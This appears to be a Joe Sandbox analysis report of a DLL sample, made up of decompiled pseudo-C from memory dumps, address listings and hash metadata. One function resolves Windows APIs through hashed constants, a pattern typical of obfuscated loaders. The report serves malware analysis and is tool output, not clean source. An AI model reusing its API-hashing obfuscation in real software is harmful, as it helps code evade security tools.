                          				 *(_t947 + 0x28) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x178)) + _t791 * 4)) - _t717;
                          				 *(_t947 + 0x20) = _t922;
                          				_t557 = E00007FF87FF88C0737F0(_t603, 0x1994,  *((intOrPtr*)(_t947 + 0x178)), _t922,  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x168)) + _t922 * 8)), _t1017 ^  *0x8c0b4180);
                          				r9d = 0x1581;
                          				 *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xb8)) + (_t941 + 1) * 4)) = _t557;
                          				_t795 = r14d;
                          				 *(_t947 + 0x90) =  *(_t947 + 0x90) ^  *( *((intOrPtr*)(_t947 + 0x148)) + _t795 * 4);
                          				 *((intOrPtr*)(_t795 +  *((intOrPtr*)(_t947 + 0x158)))) = sil;
                          				_t563 = 0x11fa / ( *(_t947 + 0x64) & 0x0000ffff);
                          				 *(_t947 + 0x64) = _t563;
                          				_t641 =  *0x8c0b4168; // 0x0
                          				 *(( *_t979 + 8) * 8 + _t1011) =  *(( *_t979 + 8) * 8 + _t1011) | _t641 + 0x00001a88;
                          				_t910 =  *_t979;
                          				_t874 =  *0x8c0b4178; // 0x0
                          				 *((short*)(_t874 + _t910 * 2)) = _t563 / _t874;
                          				 *_t979 =  *_t979 - 1;
                          				 *( *((intOrPtr*)(_t947 + 0xc8)) +  *_t979 * 2) =  *( *((intOrPtr*)(_t947 + 0xc8)) +  *_t979 * 2) ^ 0x00000eb3;
                          				r8d =  *0x8c0b4123 & 0x000000ff;
                          				r8b = r8b + 1;
                          				_t924 = _t717 + 1;
                          				r14d = r14d + 4;
                          				 *0x8c0b4123 = r8b;
                          				 *0x8c0b416c =  *0x8c0b416c & r8d - ((r8d - (0x4f6fddef * r8d >> 0x00000020) >> 0x00000001) + (0x4f6fddef * r8d >> 0x00000020) >> 0x0000000c) * 0x0000186c;
                          				_t734 = _t924 -  *0x8c0b4150; // 0x0
                          				if (_t734 <= 0) goto 0x8c0902b0;
                          				_t816 =  *(_t947 + 0x140);
                          				_t1007 =  *(_t947 + 0x70);
                          				_t695 =  *0x8c0b4148; // 0x0
                          				_t1012 =  *((intOrPtr*)(_t947 + 0x148));
                          				_t382 = _t910 + 0x25; // 0x25
                          				_t798 =  *0x8c0b4188; // 0x0
                          				r8d =  *(_t798 + _t382 * 4);
                          				r8d = r8d - _t695;
                          				r8d = r8d - (((0x9a50d99d * r8d >> 0x20) + r8d >> 0xc) + ((0x9a50d99d * r8d >> 0x20) + r8d >> 0xc >> 0x1f)) * 0x1a8b;
                          				 *0x8c0b414c = r8d;
                          				 *_t816 =  *_t816 + 1;
                          				asm("cdq");
                          				 *( *((intOrPtr*)(_t947 + 0x150)) +  *0x8c0b414c * 4) =  *(_t1012 + 0x20 +  *_t816 * 4) /  *( *((intOrPtr*)(_t947 + 0x150)) +  *0x8c0b414c * 4);
                          				_t879 =  *0x8c0b41a0; // 0x0
                          				r9d =  *(_t879 +  *((intOrPtr*)(_t947 + 0x88))) & 0x000000ff;
                          				_t880 =  *0x8c0b4178; // 0x0
                          				_t582 =  *0x8c0b414c; // 0x0
                          				_t583 = _t582 + 1;
                          				r9d = r9d ^  *(_t880 + 0x560) & 0x0000ffff;
                          				 *0x8c0b414c = _t583;
                          				 *0x8c0b4123 = 0xa0;
                          				_t719 = ( *0x8c0b4123 & 0x000000ff) + 0x00000001 & 0x000000ff;
                          				 *0x8c0b416c = ( *0x8c0b416c & 0x0000ffff) + 1;
                          				_t881 = _t583;
                          				_t803 =  *0x8c0b4188; // 0x0
                          				r8d =  *(_t803 + _t881 * 4);
                          				r8d = r8d - (((0xd62b80d7 * r8d >> 0x20) + r8d >> 7) + ((0xd62b80d7 * r8d >> 0x20) + r8d >> 7 >> 0x1f)) * 0x99;
                          				r10d = ( *0x1001 & 0x000000ff) * 0xcdd;
                          				_t591 =  *0x30ca - 0xbd8;
                          				 *(_t947 + 0x50) = _t881 ^ 0x0000172c;
                          				 *((char*)(_t947 + 0x48)) = _t591 - 0x10;
                          				 *(_t947 + 0x40) = _t591;
                          				 *(_t947 + 0x38) = r10d;
                          				 *(_t947 + 0x30) = r8d;
                          				 *(_t947 + 0x28) = _t717 + 1;
                          				 *(_t947 + 0x20) = _t719;
                          				r8d = 0x17c2;
                          				 *((intOrPtr*)( *(_t947 + 0xb0) + _t1007 * 4)) = E00007FF87FF88C0742A0(r14d, _t816,  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0x188)) + 0x6b30)), _t979);
                          				_t936 =  *((intOrPtr*)(0x407 + _t1007 * 4));
                          				if (_t719 - ( *0x8c0b4120 & 0x0000ffff) < 0) goto 0x8c090705;
                          				_t806 =  *0x8c0b4158; // 0x0
                          				_t807 =  *0x8c0b41a0; // 0x0
                          				asm("cdq");
                          				 *(_t947 + 0x40) = _t807 | 0x00000021;
                          				 *(_t947 + 0x38) = ( *( *(_t947 + 0xd0) + 0x10 + _t807 * 2) & 0x0000ffff) /  *(_t1012 + 0x53ec);
                          				 *(_t947 + 0x30) =  *((intOrPtr*)( *((intOrPtr*)(_t947 + 0xb8)) + 0x64 + _t806 * 4)) - 0x16a8;
                          				 *(_t947 + 0x28) =  *(0x1581 + _t936 * 4) & _t719;
                          				 *(_t947 + 0x20) = 0x2bcc;
                          				 *0x8c0b4168 = E00007FF87FF88C0737F0(_t603, ( *( *(_t947 + 0xd0) + 0x10 + _t807 * 2) & 0x0000ffff) %  *(_t1012 + 0x53ec), _t816, _t719, _t717 + 0x00000001 ^ 0x000002eb, 0xfffff944);
                          				 *((long long*)( *((intOrPtr*)(_t947 + 0x80)) + _t936 * 8 + 8 - 8)) =  *_t816;
                          				if (_t719 + 1 - ( *0x8c0b4120 & 0x0000ffff) >= 0) goto 0x8c090641;
                          				return  *0x8c0b4130 & 0x0000ffff;
                          			}
















































































































                          0x7ff88c08f8f0
                          0x7ff88c08f8f0
                          0x7ff88c08f8f5
                          0x7ff88c08f8fa
                          0x7ff88c08f905
                          0x7ff88c08f90b
                          0x7ff88c08f912
                          0x7ff88c08f919
                          0x7ff88c08f91c
                          0x7ff88c08f924
                          0x7ff88c08f927
                          0x7ff88c08f92f
                          0x7ff88c08f932
                          0x7ff88c08f941
                          0x7ff88c08f94a
                          0x7ff88c08f94e
                          0x7ff88c08f956
                          0x7ff88c08f95d
                          0x7ff88c08f963
                          0x7ff88c08f96e
                          0x7ff88c08f975
                          0x7ff88c08f97d
                          0x7ff88c08f980
                          0x7ff88c08f984
                          0x7ff88c08f988
                          0x7ff88c08f98c
                          0x7ff88c08f99e
                          0x7ff88c08f9a6
                          0x7ff88c08f9b2
                          0x7ff88c08f9c9
                          0x7ff88c08f9d1
                          0x7ff88c08f9d8
                          0x7ff88c08f9db
                          0x7ff88c08f9eb
                          0x7ff88c08f9f2
                          0x7ff88c08fa01
                          0x7ff88c08fa05
                          0x7ff88c08fa0f
                          0x7ff88c08fa17
                          0x7ff88c08fa1e
                          0x7ff88c08fa25
                          0x7ff88c08fa2e
                          0x7ff88c08fa3e
                          0x7ff88c08fa46
                          0x7ff88c08fa4d
                          0x7ff88c08fa58
                          0x7ff88c08fa5d
                          0x7ff88c08fa63
                          0x7ff88c08fa6a
                          0x7ff88c08fa81
                          0x7ff88c08fa98
                          0x7ff88c08faa2
                          0x7ff88c08faac
                          0x7ff88c08fab9
                          0x7ff88c08fac9
                          0x7ff88c08fadd
                          0x7ff88c08fae6
                          0x7ff88c08faf3
                          0x7ff88c08faff
                          0x7ff88c08fb40
                          0x7ff88c08fb4a
                          0x7ff88c08fb5f
                          0x7ff88c08fb64
                          0x7ff88c08fb69
                          0x7ff88c08fb6e
                          0x7ff88c08fb72
                          0x7ff88c08fb77
                          0x7ff88c08fb80
                          0x7ff88c08fb88
                          0x7ff88c08fb8d
                          0x7ff88c08fb9d
                          0x7ff88c08fba5
                          0x7ff88c08fbab
                          0x7ff88c08fbb7
                          0x7ff88c08fbba
                          0x7ff88c08fbc1
                          0x7ff88c08fbce
                          0x7ff88c08fbe0
                          0x7ff88c08fbe7
                          0x7ff88c08fbee
                          0x7ff88c08fbfd
                          0x7ff88c08fc01
                          0x7ff88c08fc0d
                          0x7ff88c08fc1b
                          0x7ff88c08fc1f
                          0x7ff88c08fc25
                          0x7ff88c08fc6c
                          0x7ff88c08fc8f
                          0x7ff88c08fcab
                          0x7ff88c08fcc1
                          0x7ff88c08fcc4
                          0x7ff88c08fccb
                          0x7ff88c08fcdf
                          0x7ff88c08fcec
                          0x7ff88c08fcf8
                          0x7ff88c08fcff
                          0x7ff88c08fd04
                          0x7ff88c08fd09
                          0x7ff88c08fd0e
                          0x7ff88c08fd13
                          0x7ff88c08fd20
                          0x7ff88c08fd23
                          0x7ff88c08fd2e
                          0x7ff88c08fd32
                          0x7ff88c08fd38
                          0x7ff88c08fd46
                          0x7ff88c08fd4c
                          0x7ff88c08fd52
                          0x7ff88c08fd5e
                          0x7ff88c08fd66
                          0x7ff88c08fd6b
                          0x7ff88c08fd73
                          0x7ff88c08fd80
                          0x7ff88c08fd8b
                          0x7ff88c08fda0
                          0x7ff88c08fdab
                          0x7ff88c08fdb6
                          0x7ff88c08fdbd
                          0x7ff88c08fdc2
                          0x7ff88c08fde1
                          0x7ff88c08fdea
                          0x7ff88c08fdf4
                          0x7ff88c08fe03
                          0x7ff88c08fe09
                          0x7ff88c08fe10
                          0x7ff88c08fe1d
                          0x7ff88c08fe2a
                          0x7ff88c08fe32
                          0x7ff88c08fe38
                          0x7ff88c08fe40
                          0x7ff88c08fe52
                          0x7ff88c08fe58
                          0x7ff88c08fe67
                          0x7ff88c08fe6a
                          0x7ff88c08fe6f
                          0x7ff88c08fe85
                          0x7ff88c08fe91
                          0x7ff88c08fe9f
                          0x7ff88c08feb9
                          0x7ff88c08fed8
                          0x7ff88c08fedc
                          0x7ff88c08fee6
                          0x7ff88c08feea
                          0x7ff88c08fef1
                          0x7ff88c08ff14
                          0x7ff88c08ff44
                          0x7ff88c08ff52
                          0x7ff88c08ff59
                          0x7ff88c08ff68
                          0x7ff88c08ff6f
                          0x7ff88c08ff77
                          0x7ff88c08ff7c
                          0x7ff88c08ff85
                          0x7ff88c08ff8a
                          0x7ff88c08ff8f
                          0x7ff88c08ff94
                          0x7ff88c08ffb1
                          0x7ff88c08ffb7
                          0x7ff88c08ffc4
                          0x7ff88c08ffc4
                          0x7ff88c08ffd2
                          0x7ff88c08ffdd
                          0x7ff88c08ffe8
                          0x7ff88c08ffed
                          0x7ff88c08fff5
                          0x7ff88c090014
                          0x7ff88c090018
                          0x7ff88c090020
                          0x7ff88c090023
                          0x7ff88c090027
                          0x7ff88c090030
                          0x7ff88c090033
                          0x7ff88c090042
                          0x7ff88c090048
                          0x7ff88c09004f
                          0x7ff88c090057
                          0x7ff88c090061
                          0x7ff88c090066
                          0x7ff88c09006b
                          0x7ff88c09008c
                          0x7ff88c090090
                          0x7ff88c090097
                          0x7ff88c09009d
                          0x7ff88c0900ac
                          0x7ff88c0900b3
                          0x7ff88c0900bc
                          0x7ff88c0900bf
                          0x7ff88c0900cd
                          0x7ff88c0900d1
                          0x7ff88c0900da
                          0x7ff88c0900e1
                          0x7ff88c0900f0
                          0x7ff88c0900fd
                          0x7ff88c090104
                          0x7ff88c09010a
                          0x7ff88c090119
                          0x7ff88c09011c
                          0x7ff88c090123
                          0x7ff88c090133
                          0x7ff88c090138
                          0x7ff88c09013e
                          0x7ff88c090143
                          0x7ff88c090148
                          0x7ff88c090151
                          0x7ff88c090155
                          0x7ff88c09015d
                          0x7ff88c090165
                          0x7ff88c09016a
                          0x7ff88c090193
                          0x7ff88c0901a4
                          0x7ff88c0901b5
                          0x7ff88c0901c1
                          0x7ff88c0901cb
                          0x7ff88c0901d5
                          0x7ff88c0901de
                          0x7ff88c0901e6
                          0x7ff88c0901f3
                          0x7ff88c0901fc
                          0x7ff88c090204
                          0x7ff88c09020f
                          0x7ff88c090213
                          0x7ff88c090218
                          0x7ff88c090220
                          0x7ff88c090223
                          0x7ff88c09022b
                          0x7ff88c09022f
                          0x7ff88c090235
                          0x7ff88c09023c
                          0x7ff88c090247
                          0x7ff88c090257
                          0x7ff88c09025d
                          0x7ff88c090262
                          0x7ff88c090275
                          0x7ff88c090279
                          0x7ff88c090282
                          0x7ff88c09028d
                          0x7ff88c0902d6
                          0x7ff88c0902da
                          0x7ff88c0902e2
                          0x7ff88c0902ea
                          0x7ff88c0902ef
                          0x7ff88c0902fe
                          0x7ff88c090309
                          0x7ff88c090315
                          0x7ff88c090320
                          0x7ff88c090327
                          0x7ff88c09033f
                          0x7ff88c090347
                          0x7ff88c090350
                          0x7ff88c090355
                          0x7ff88c09035a
                          0x7ff88c09035f
                          0x7ff88c090372
                          0x7ff88c090380
                          0x7ff88c090385
                          0x7ff88c090391
                          0x7ff88c0903a4
                          0x7ff88c0903ad
                          0x7ff88c0903b5
                          0x7ff88c0903c4
                          0x7ff88c0903d3
                          0x7ff88c0903d7
                          0x7ff88c0903da
                          0x7ff88c090405
                          0x7ff88c090409
                          0x7ff88c09040f
                          0x7ff88c090418
                          0x7ff88c090434
                          0x7ff88c090439
                          0x7ff88c090447
                          0x7ff88c09044b
                          0x7ff88c090454
                          0x7ff88c09045b
                          0x7ff88c090462
                          0x7ff88c090468
                          0x7ff88c090470
                          0x7ff88c090475
                          0x7ff88c09047b
                          0x7ff88c09048b
                          0x7ff88c090491
                          0x7ff88c090498
                          0x7ff88c0904a1
                          0x7ff88c0904ba
                          0x7ff88c0904bd
                          0x7ff88c0904c4
                          0x7ff88c0904de
                          0x7ff88c0904e5
                          0x7ff88c090509
                          0x7ff88c09051b
                          0x7ff88c090520
                          0x7ff88c090527
                          0x7ff88c09052d
                          0x7ff88c09053d
                          0x7ff88c090540
                          0x7ff88c090548
                          0x7ff88c09054e
                          0x7ff88c09055b
                          0x7ff88c090565
                          0x7ff88c090568
                          0x7ff88c09056f
                          0x7ff88c09058e
                          0x7ff88c090599
                          0x7ff88c0905a7
                          0x7ff88c0905cf
                          0x7ff88c0905d6
                          0x7ff88c0905da
                          0x7ff88c0905df
                          0x7ff88c0905e4
                          0x7ff88c0905e9
                          0x7ff88c0905ee
                          0x7ff88c0905f2
                          0x7ff88c09060b
                          0x7ff88c09060f
                          0x7ff88c090620
                          0x7ff88c090641
                          0x7ff88c09066b
                          0x7ff88c09068a
                          0x7ff88c0906a0
                          0x7ff88c0906a5
                          0x7ff88c0906b1
                          0x7ff88c0906b6
                          0x7ff88c0906bb
                          0x7ff88c0906d5
                          0x7ff88c0906f2
                          0x7ff88c0906ff
                          0x7ff88c09071f

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID: U$U
                          • API String ID: 0-2145350036
                          • Opcode ID: 937f22ca363b0ae4925abfaabb4bdcfae65207e6d9454271833be54c44e087f5
                          • Instruction ID: 76cc91363f7bb993e7e982cca13cdf1388cfd0a57b40b68b0d7cc73eb4609926
                          • Opcode Fuzzy Hash: 937f22ca363b0ae4925abfaabb4bdcfae65207e6d9454271833be54c44e087f5
                          • Instruction Fuzzy Hash: 01829072A08A8586DB60CF59F8903B97BA4F79ABC5F014536DA8D87768DF3CD211DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ExceptionRaise_clrfp
                          • String ID:
                          • API String ID: 15204871-0
                          • Opcode ID: 4b7e5130b62dd50ab60c4d7127af619fbc2aea48fc4e0f0a345ebf94294e7805
                          • Instruction ID: 2503332c020764341badfdcb58de7338a09ec578ef1f6e6509694ebfe6a207e3
                          • Opcode Fuzzy Hash: 4b7e5130b62dd50ab60c4d7127af619fbc2aea48fc4e0f0a345ebf94294e7805
                          • Instruction Fuzzy Hash: 3AB12E73A14B858BEB25CF2AC8453687BE0F745B88F15C925DAAD877A8CB39D451C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 31%
                          			E0000027E27ED3713CD8(intOrPtr __ecx, long long __rbx, void* __rdx, long long __rdi, void* __r9, long long __r12, intOrPtr _a8, long long* _a40, void* _a48, intOrPtr _a56) {
                          				void* _v24;
                          				char _v64;
                          				intOrPtr _v72;
                          				char _v80;
                          				char _v88;
                          				intOrPtr _v104;
                          				long long _v112;
                          				long long _v120;
                          				char _t62;
                          				long long* _t123;
                          				long long* _t124;
                          				void* _t156;
                          				long long* _t157;
                          				void* _t166;
                          				void* _t168;
                          				void* _t172;
                          
                          				_t123 = _t157;
                          				 *((long long*)(_t123 + 0x10)) = __rbx;
                          				 *((long long*)(_t123 + 0x18)) = __rdi;
                          				 *((long long*)(_t123 + 0x20)) = __r12;
                          				 *((intOrPtr*)(_t123 + 8)) = __ecx;
                          				_t154 =  *0xd371d458;
                          				r13d = r8d;
                          				E0000027E27ED371908C(0x4e1c2e77, _t123,  *((intOrPtr*)( *0xd371d458 + 0x20)));
                          				if (_t123 == 0) goto 0xd3713d36;
                          				r9d = 0x18;
                          				r8d = 0;
                          				_v120 = 0xf0000040;
                          				 *_t123(_t172, _t168, _t166);
                          				goto 0xd3713d38;
                          				if (0 == 0) goto 0xd3713f1a;
                          				r8d = _a56;
                          				_t11 =  &_v80; // 0xfb849f3f
                          				if (E0000027E27ED3717E40(__rbx, _v72, _t156, _t11) != 0) goto 0xd3713efc;
                          				_t13 = _t123 + 0x10; // 0x10
                          				r8d = _t13;
                          				0xd371487a();
                          				E0000027E27ED371908C(0xd74cfe41, _t123,  *((intOrPtr*)( *0xd371d458 + 0x20)));
                          				if (_t123 == 0) goto 0xd3713da1;
                          				r9d = 0;
                          				 *_t123();
                          				goto 0xd3713da3;
                          				if (0 != 0) goto 0xd3713dcd;
                          				E0000027E27ED371908C(0xc06f8334, _t123,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t123 == 0) goto 0xd3713dc0;
                          				 *_t123();
                          				goto 0xd3713dc5;
                          				if (0x7f != 0) goto 0xd3713efc;
                          				r12d = 0;
                          				_t62 =  >  ? 0x10 : r13d;
                          				r8d = _t62;
                          				_v88 = _t62;
                          				0xd37147b0();
                          				r13d = r13d - _v88;
                          				if (_a8 == 0) goto 0xd3713e50;
                          				E0000027E27ED371908C(0x4217c141, _t123,  *((intOrPtr*)(_t154 + 0x20)));
                          				if (_t123 == 0) goto 0xd3713e8b;
                          				r8d = 0;
                          				_t26 =  &_v88; // 0xfb849f37
                          				_v104 = 0x20;
                          				_v112 = _t26;
                          				_t29 =  &_v64; // 0xfb849f4f
                          				r8b = r13d == 0;
                          				_v120 = _t29;
                          				r9d = 0;
                          				 *_t123();
                          				goto 0xd3713e8d;
                          				E0000027E27ED371908C(0x8ea73a36, _t123, _v80);
                          				if (_t123 == 0) goto 0xd3713e8b;
                          				r8d = 0;
                          				_t32 =  &_v88; // 0xfb849f37
                          				_v112 = _t32;
                          				r8b = r13d == 0;
                          				_t34 =  &_v64; // 0xfb849f4f
                          				_v120 = _t34;
                          				r9d = 0;
                          				 *_t123();
                          				goto 0xd3713e8d;
                          				if (0 == 0) goto 0xd3713eb9;
                          				r8d = _v88;
                          				0xd37147b0();
                          				r12d = r12d + _v88;
                          				if (r13d == 0) goto 0xd3713ed7;
                          				goto 0xd3713dd2;
                          				E0000027E27ED371908C(0xc06f8334, _t123,  *((intOrPtr*)(_t154 + 0x18)));
                          				if (_t123 == 0) goto 0xd3713ed2;
                          				 *_t123();
                          				goto 0xd3713ed7;
                          				_t124 = _a40;
                          				 *_t124 = r12d;
                          				E0000027E27ED371908C(0xff709000, _t124,  *((intOrPtr*)(_t154 + 0x20)));
                          				if (_t124 == 0) goto 0xd3713efc;
                          				 *_t124();
                          				E0000027E27ED371908C(0xbaca8f4d, _t124,  *((intOrPtr*)(_t154 + 0x20)));
                          				if (_t124 == 0) goto 0xd3713f38;
                          				 *_t124();
                          				goto 0xd3713f38;
                          				E0000027E27ED371908C(0xc06f8334, _t124,  *((intOrPtr*)(_t154 + 0x18)));
                          				if (_t124 == 0) goto 0xd3713f33;
                          				 *_t124();
                          				goto 0xd3713f38;
                          				return 0x7f;
                          			}



















                          0x27ed3713cd8
                          0x27ed3713cdb
                          0x27ed3713cdf
                          0x27ed3713ce3
                          0x27ed3713ce7
                          0x27ed3713cf7
                          0x27ed3713d0d
                          0x27ed3713d10
                          0x27ed3713d18
                          0x27ed3713d1f
                          0x27ed3713d25
                          0x27ed3713d2a
                          0x27ed3713d32
                          0x27ed3713d34
                          0x27ed3713d3a
                          0x27ed3713d40
                          0x27ed3713d55
                          0x27ed3713d63
                          0x27ed3713d6c
                          0x27ed3713d6c
                          0x27ed3713d75
                          0x27ed3713d83
                          0x27ed3713d8b
                          0x27ed3713d9a
                          0x27ed3713d9d
                          0x27ed3713d9f
                          0x27ed3713da5
                          0x27ed3713db0
                          0x27ed3713db8
                          0x27ed3713dba
                          0x27ed3713dbe
                          0x27ed3713dc7
                          0x27ed3713dcd
                          0x27ed3713de0
                          0x27ed3713de8
                          0x27ed3713deb
                          0x27ed3713def
                          0x27ed3713df8
                          0x27ed3713e0b
                          0x27ed3713e12
                          0x27ed3713e1a
                          0x27ed3713e1c
                          0x27ed3713e1f
                          0x27ed3713e24
                          0x27ed3713e2c
                          0x27ed3713e31
                          0x27ed3713e39
                          0x27ed3713e3d
                          0x27ed3713e47
                          0x27ed3713e4c
                          0x27ed3713e4e
                          0x27ed3713e55
                          0x27ed3713e5d
                          0x27ed3713e5f
                          0x27ed3713e62
                          0x27ed3713e6a
                          0x27ed3713e6f
                          0x27ed3713e73
                          0x27ed3713e78
                          0x27ed3713e82
                          0x27ed3713e87
                          0x27ed3713e89
                          0x27ed3713e8f
                          0x27ed3713e91
                          0x27ed3713e9e
                          0x27ed3713ea7
                          0x27ed3713eb2
                          0x27ed3713eb4
                          0x27ed3713ec2
                          0x27ed3713eca
                          0x27ed3713ecc
                          0x27ed3713ed0
                          0x27ed3713ed7
                          0x27ed3713ee4
                          0x27ed3713eeb
                          0x27ed3713ef3
                          0x27ed3713efa
                          0x27ed3713f05
                          0x27ed3713f0d
                          0x27ed3713f16
                          0x27ed3713f18
                          0x27ed3713f23
                          0x27ed3713f2b
                          0x27ed3713f2d
                          0x27ed3713f31
                          0x27ed3713f57

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID: $@
                          • API String ID: 1452528299-1077428164
                          • Opcode ID: 7c51c71e63158f765adb5c91cb5b66e3a07b5bc89c7899e7a300cc364f0e630c
                          • Instruction ID: 631a1d2a7a5373c7107b42ed90e81a2764147d096a4c10f7f3f005a1e8db6bc3
                          • Opcode Fuzzy Hash: 7c51c71e63158f765adb5c91cb5b66e3a07b5bc89c7899e7a300cc364f0e630c
                          • Instruction Fuzzy Hash: 6C617932719F85C2FF709B61A04571BA7A8FBCE784F5514659A8D83BCADE38C8058B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E00007FF87FF88C0776E0(short __edx, void* __rcx, long long __r8, signed int* __r9) {
                          				void* __rbx;
                          				void* __rdi;
                          				signed int _t369;
                          				signed int _t389;
                          				signed int _t393;
                          				signed int _t412;
                          				signed int _t423;
                          				intOrPtr _t426;
                          				intOrPtr _t433;
                          				long long _t439;
                          				signed int _t464;
                          				signed int _t502;
                          				signed int _t503;
                          				signed int _t512;
                          				signed long long _t515;
                          				signed int _t530;
                          				signed char _t533;
                          				signed int _t539;
                          				void* _t579;
                          				long long _t592;
                          				intOrPtr _t593;
                          				signed long long _t595;
                          				signed long long _t596;
                          				signed long long _t597;
                          				signed short _t599;
                          				signed long long _t600;
                          				signed long long _t603;
                          				signed long long _t604;
                          				intOrPtr _t606;
                          				intOrPtr _t609;
                          				signed long long _t610;
                          				signed long long _t611;
                          				intOrPtr _t612;
                          				signed long long _t613;
                          				intOrPtr _t618;
                          				intOrPtr _t620;
                          				signed long long _t622;
                          				intOrPtr _t623;
                          				signed long long _t626;
                          				intOrPtr _t627;
                          				intOrPtr _t629;
                          				signed long long _t630;
                          				signed long long _t631;
                          				intOrPtr _t637;
                          				signed int* _t638;
                          				intOrPtr _t640;
                          				signed long long _t650;
                          				signed long long _t652;
                          				signed long long _t658;
                          				signed long long _t664;
                          				intOrPtr _t675;
                          				intOrPtr _t684;
                          				signed long long _t687;
                          				signed long long _t688;
                          				signed long long _t690;
                          				signed long long _t691;
                          				signed long long _t693;
                          				void* _t695;
                          				signed int* _t696;
                          				signed int* _t697;
                          				void* _t699;
                          				signed long long _t702;
                          				signed int* _t706;
                          				void* _t710;
                          				void* _t711;
                          				signed long long _t716;
                          				signed long long _t717;
                          				intOrPtr _t719;
                          				intOrPtr _t720;
                          				long long _t723;
                          				signed char _t725;
                          				signed long long _t726;
                          				long long _t734;
                          				signed long long _t735;
                          				signed long long _t742;
                          				intOrPtr _t743;
                          				long long _t745;
                          				void* _t746;
                          				signed long long _t747;
                          				signed long long _t748;
                          				signed long long _t749;
                          				void* _t751;
                          				void* _t754;
                          				intOrPtr _t755;
                          				intOrPtr _t756;
                          				signed long long _t757;
                          				void* _t760;
                          				signed long long _t761;
                          				signed long long _t762;
                          				signed long long _t763;
                          				signed long long _t765;
                          
                          				 *((long long*)(_t710 + 0x18)) = __r8;
                          				 *((short*)(_t710 + 0x10)) = __edx;
                          				_t711 = _t710 - 0xa8;
                          				_t755 =  *((intOrPtr*)(_t711 + 0x110));
                          				r8d =  *0x8c0b4130 & 0x0000ffff;
                          				_t761 =  *(_t711 + 0x130);
                          				 *(_t711 + 0x108) =  *0x8c0b4158 & 0x000000ff;
                          				_t592 =  *0x8c0b4178; // 0x0
                          				 *((long long*)(_t711 + 0x68)) = _t592;
                          				 *((long long*)(_t711 + 0x88)) = _t592;
                          				_t369 =  *0x8c0b4148; // 0x0
                          				r9d =  *0x8c0b4134; // 0x0
                          				 *(_t711 + 0xf0) =  *(_t755 + (_t369 + _t369) * 4) & 0x000000ff;
                          				r9d = r9d + 1;
                          				_t593 =  *0x8c0b4128; // 0x0
                          				 *(_t711 + 0x60) = r9d;
                          				_t747 =  *((intOrPtr*)(_t593 + 0x6f80));
                          				 *0x8c0b4134 = r9d;
                          				 *0x8c0b4133 =  *0x8c0b4133 + 1;
                          				_t696 =  *((intOrPtr*)(_t755 + 0x7148)) - 0x1a89;
                          				 *(_t711 + 0x90) = _t696;
                          				_t595 =  *0x8c0b4124;
                          				_t742 = _t696[_t761] &  *0x533d & _t595;
                          				 *(_t711 + 0x70) = _t742;
                          				asm("cdq");
                          				 *(0x32c + ( *_t696 +  *_t696) * 4) = 0x111b /  *(0x32c + ( *_t696 +  *_t696) * 4);
                          				_t723 = _t747 * 8;
                          				 *(_t711 + 0x80) = _t595;
                          				 *((long long*)(_t711 + 0x78)) = _t723;
                          				 *(__rcx + _t595 * 4) = r11d;
                          				_t684 =  *0x8c0b4178; // 0x0
                          				 *(_t684 + _t723) = ( *(_t684 + _t723) & 0x0000ffff) * ( *0x8c0b4123 & 0x000000ff);
                          				_t596 =  *0x8c0b4128; // 0x0
                          				 *0x8c0b4180 = _t596;
                          				_t685 =  *_t696;
                          				_t41 = _t685 + 1; // 0x1
                          				 *_t696 = _t41;
                          				_t530 =  *0x8c0b414c; // 0x0
                          				_t44 = _t685 + 0x1b; // 0x1b
                          				r11d =  *(_t596 + _t596 * 2 + 0x3996) & 0x000000ff;
                          				_t597 =  *0x8c0b4138; // 0x0
                          				_t734 =  *((intOrPtr*)(_t597 + _t44 * 8));
                          				 *0x8c0b414c = _t530 + 1;
                          				 *((long long*)(_t711 + 0x58)) =  *(__r8 + 0xab0) * 0x1a29;
                          				 *(_t711 + 0x50) = 0x172d;
